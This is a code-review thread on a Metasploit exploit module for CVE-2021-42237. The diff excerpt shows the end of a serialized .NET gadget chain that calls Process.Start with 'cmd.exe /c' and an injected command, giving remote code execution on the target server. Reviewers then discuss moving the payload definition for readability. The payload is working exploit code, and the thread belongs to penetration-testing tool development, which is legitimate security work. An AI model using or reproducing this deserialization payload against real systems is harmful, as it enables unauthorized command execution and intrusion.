modules/exploits/windows/http/cve_2021_42237.rb

```diff
@@ -0,0 +1,216 @@
+                                </Delegate>
+                                <method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
+                                    xmlns=""
+                                    xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
+                                    <Name z:Ref="11" i:nil="true"/>
+                                    <AssemblyName z:Ref="12" i:nil="true"/>
+                                    <ClassName z:Ref="13" i:nil="true"/>
+                                    <Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature>
+                                    <Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Diagnostics.Process Start(System.String, System.String)</Signature2>
+                                    <MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType>
+                                    <GenericArguments i:nil="true"/>
+                                </method0>
+                                <method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0"
+                                    xmlns=""
+                                    xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection">
+                                    <Name z:Ref="8" i:nil="true"/>
+                                    <AssemblyName z:Ref="6" i:nil="true"/>
+                                    <ClassName z:Ref="9" i:nil="true"/>
+                                    <Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature>
+                                    <Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2>
+                                    <MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType>
+                                    <GenericArguments i:nil="true"/>
+                                </method1>
+                            </_comparison>
+                        </Comparer>
+                        <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
+                            xmlns="">
+                            <string z:Id="25"
+                                xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c #{cmd.encode(xml: :text)}</string>
+                            <string z:Id="26"
+                                xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd.exe</string>
+                        </Items>
+                    </ArrayOfstring>
+                </parameter>
+            </parameters>|
```

Comment:
Maybe pull this out so you're not defining it on every invocation of `execute_command`. Up to you. Would make the method more readable.

Reply:
Yeah will do that, I was actually thinking the same thing when looking at this code.

Reply:
Fixed with https://github.com/rapid7/metasploit-framework/pull/15858/commits/be4fa90f1aab0ef38ab1ca21cd02754be6940a5c